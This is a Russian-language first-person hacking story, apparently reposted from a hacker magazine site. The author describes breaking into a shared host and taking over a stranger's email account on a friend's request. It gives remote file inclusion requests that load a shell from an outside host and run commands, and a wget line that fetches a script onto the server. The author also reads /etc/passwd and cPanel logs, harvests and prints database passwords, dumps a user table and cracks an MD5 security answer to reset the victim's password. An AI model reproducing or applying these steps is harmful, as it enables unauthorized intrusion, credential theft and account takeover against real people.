special

This webpage has been robot translated, sorry for typos if any. To view the original content of the page, simply replace the translation subdomain with www in the address bar or use this link.

Взлом мыла и почтовика

 

Так повелось, что я никогда не брался за взлом мыл. Но тут поступило заманчивое предложение
от одного знакомого, которому позарез нужен был доступ к одному мылу.
Само мыло располагалось на небольшом почтовике *.co.uk.
Знакомый пробовал брутить мыло, но результата это не принесло и он обратился к мне.
Сперва я простмотрел сам почтовик. Кроме окошка ввода логина/пароля все сплошной html.
Попробовал форму ввода пароля на Sql-инъекцию, но ковычки фильтровались.
Server: Apache/1.3.34 (Unix) PHP/5.0.5 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.25 OpenSSL/0.9.7a
Окрытые порты с сервисами тоже не радовали.

Решил проверить, не хостится ли тут еще кто-то. Оказалось по данному ip числится еще несколько десятков сайтов.
Прошелся по ним, единственный phpBB оказался патченным, поэтому ни один из эксплойтов не сработал.
И тут я наткнулся на продукт ArticleBeach www.articlebeach.com.
Первый же запрос:
http://www.***.com/index.php?page=http://durito.narod.ru/sh&cmd=ls%20-lpa
выдал мне список файлов сервера. Зря програмисты ArticleBeach ели свой хлеб с маслом.
полазив по сайту я нашел еще одни баг, добродушно оставленный разработчиками ArticleBeach,
в директории /includes/ любой юзер может просмотреть файл config.inc следующего содержания:
Пример файла взят с сайта девелоперов ArticleBeach http://www.articlebeach.com/includes/config.inc
<?
global $_cn;
global $dbserver;
global $db;
global $dbuser;
global $dbpass;

//mysql database server,login,password & Database name
$dbserver ="localhost";
$database_connect="article_art";
$dbuser ="article_jer";
$dbpass ="aaaaa";

$connect = mysql_connect($dbserver, $dbuser, $dbpass)
or die("Couldn't connect to MySQL");
mysql_select_db($database_connect, $connect);


?>

Как вы уже поняли это реквизиты доступа к базе данных сервера.
К сожаленю в моем случае пароль на базу данных не подошел к фтп,
чего нескажешь о других сайтах, где стоит продукт от ArticleBeach.
Пришлось ковырять сервер через внешнюю инклуду.
Открыв /etc/passwd я не смог обнаружить имя нужного мне почтовика,
логины юзеров и доменные имена сайтов несовпадали.
Зато была возможность просматривать web-директории пользователей: /home/*/public_html/
Уже хотел было начать тупо перебирать всех по списку, но решил проверить файл accounting.log,
в котором хранятся логины и доменные имена на cpanel. И точно я получил список доменных имен.
Выбрал нужный и стал изучать веб-директорию. Быстро нашел в исходниках реквизиты доступа к БД MySQL:
'database' => '***_themail', // Name of your MySQL database
'username' => '***_postman', // The username and password that
'password' => 'jkretj3h45j'
Пароль опять не подошел к фтп.

Осталось только прицепится к БД. Надо было искать доступную на запись директорию или файл.
И опять спасибо разработчикам ArticleBeach которые позаботились в своем продукте о директории /backup/ с правами drwxrwxrwx.
http://www.***.com/index.php?page=http://durito.narod.ru/sh&cmd=wget -O backup/sql.php http://durito.narod.ru/sql.php
и фиг, то же самое с GET, links, fetch, lynx. Позже я узнал, что запуск wget и GET запрещался PHP Secure, links, fetch и lynx отсутсвовали.
Продолжил внутренний осмотр сайтов хостера. Навыуживал еще несколько паролей к БД, но к фтп они опять не подошли, все пароли представляли собой многосимвольную абракадабру.
И вдруг тайваньский сайт, интуиция подсказала проверить его и вот оно - пароль доступа к БД - anahol !!! Конект к фтп, пасс проходит и скрипт для работы с БД от rst.void.ru залит.

Конект к базе, нахожу нужную таблицу и дамплю ее. А вот и заветное мыло, пароль правда зашифрован MD5,
но это дело поправимое, правда долгое и муторное. Но для начала я решил проверить хеш на http://md5.rednoize.com/, но пасс
не был найден, и я уже приготовился было к долгому перебору, но тут заметил, что и ответ на секретный вопрос тоже закодирован в MD5.


Пробиваю на md5.rednoize.com секретный вопрос и вот он: Cheung !!!


Захожу не почтовик и отвечаю на секретный вопрос. Мне предлагают ввести новый пароль и его подтвердить. Шах и мат!
И мой приятель получает доступ к заветному мылу, незабыв мне выкатить пива. А я удаляюсь его жадно поглощать.

опубликована на www.xakep.ru

Твой bug Durito.
_________________
EAT THE RICH!

 

  Created 1996-2005 by durito. Copyright 2006 by durito
All Rights Reserved


Back

';>